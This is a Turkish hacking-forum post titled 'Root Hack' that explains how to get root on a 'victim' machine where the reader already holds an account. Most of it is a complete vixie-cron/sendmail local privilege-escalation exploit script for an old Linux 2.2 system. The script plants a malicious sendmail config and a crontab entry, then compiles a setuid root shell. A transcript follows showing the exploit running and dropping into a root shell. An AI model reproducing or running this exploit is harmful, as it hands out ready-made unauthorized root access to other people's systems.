Forum
Aktif konular
Üyeler
Kurallar
Arama
Root Hack Root Hack
-
Arkadaşlar root hack için victim pc de bir account unuzun olması gerekiyor.. Eski bir linux hatasıyla başlayalım..
gabo@web5 gabo]$ id;uname -a
uid=1012(me) gid=100(users) groups=100(users)
Linux ns 2.2.16 #97 Fri Jun 16 19:45:30 PDT 2000 i586 unknown
[gabo@web5 gabo]$ ls -lsa /usr/bin/crontab
12 -rws--x--x 1 root bin 10192 Jun 19 09:55 /usr/bin/crontab
----------------yapıştır----------------
#!/bin/sh
clear
echo '------------------------------------------------------------------'
echo 'Marchew Hyperreal Industries <marchew@dione.ids.pl>'
echo 'Stumilowy Las Team <100milowy@gdynia.ids.pl>'
echo '---------------------------- presents ----------------------------'
echo
echo ' -= vixie-cron root sploit Big_lord <lcamtuf@ids.pl> =-'
echo
echo '
Checking dependencies:'
echo -n '
vixie crontab: '
if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo -n '
Berkeley Sendmail: '
if [ -f /usr/sbin/sendmail ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo -n '
gcc compiler: '
if [ -x /usr/bin/gcc ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo ' [?] Dependiences not verified:'
echo '
proper version of vixie crontab'
echo '
writable /tmp without noexec/nosuid option'
echo '
Exploit started.'
echo "
Setting up .cf file for sendmail..."
cat >/tmp/vixie-cf <<__eof__
V7/Berkeley
O QueueDirectory=/tmp
O DefaultUser=0:0
R$+ $#local $: $1 regular local names
Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
T=DNS/RFC822/X-Unix,
A=vixie-root
__eof__
echo '
Setting up phase #1 tool (phase #2 tool compiler)...'
cat >/tmp/vixie-root <<__eof__
#!/bin/sh
gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d
chmod 6755 /tmp/vixie-own3d
__eof__
chmod 755 /tmp/vixie-root
echo '
Setting up phase #2 tool (rootshell launcher)...'
cat >/tmp/vixie-own3d.c <<__eof__
main() {
setuid(0);
setgid(0);
unlink("/tmp/vixie-own3d");
execl("/bin/sh","sh","-i",0);
}
__eof__
echo '
Putting evil crontab entry...'
crontab - <<__eof__
MAILTO='-C/tmp/vixie-cf dupek'
* * * * * nonexist
__eof__
echo '
Patience is a virtue... Wait up to 60 seconds.'
ILE=0
echo -n '
Tick.'
while [ $ILE -lt 50 ]; do
sleep 2
let ILE=ILE+1
test -f /tmp/vixie-own3d && ILE=1000
echo -n '.'
done
echo
echo '
Huh, done. Removing crontab entry...'
crontab -r
echo '
Removing helper files...'
rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null
echo '
And now...'
if [ -f /tmp/vixie-own3d ]; then
echo '
Entering root shell, babe '
echo
/tmp/vixie-own3d
echo
else
echo '[-] Oops, no root shell found, patched system or configuration problem '
fi
echo '
Exploit done.'
----------------Yapıştır----------------
[gabo@web5 gabo]$ sh rootcron.sh
------------------------------------------------------------------
Marchew Hyperreal Industries <marchew@dione.ids.pl>
Stumilowy Las Team <100milowy@gdynia.ids.pl>
---------------------------- presents ----------------------------
-= vixie-cron root sploit by Big_lord<lcamtuf@ids.pl> =-
Checking dependencies:
vixie crontab: OK
Berkeley Sendmail: OK
gcc compiler: OK
[?] Dependiences not verified:
proper version of vixie crontab
writable /tmp without noexec/nosuid option
Exploit started.
Setting up .cf file for sendmail...
Setting up phase #1 tool (phase #2 tool compiler)...
Setting up phase #2 tool (rootshell launcher)...
Putting evil crontab entry...
Patience is a virtue... Wait up to 60 seconds.
Tick.....................................................
Huh, done. Removing crontab entry...
crontab 2.3.2
crontab file <opts> replace crontab from file
crontab - <opts> replace crontab from stdin
crontab -u user specify user
crontab -l [user] list crontab for user
crontab -e [user] edit crontab for user
crontab -d [user] delete crontab for user
crontab -c dir specify crontab directory
Removing helper files...
And now...
Entering root shell, babe
bash# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
bash#
EDITED by CYB3R-SPY -
Lamer Yöntemleriyle Ugrasamam .!!!!!!!!!!!!!
-
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla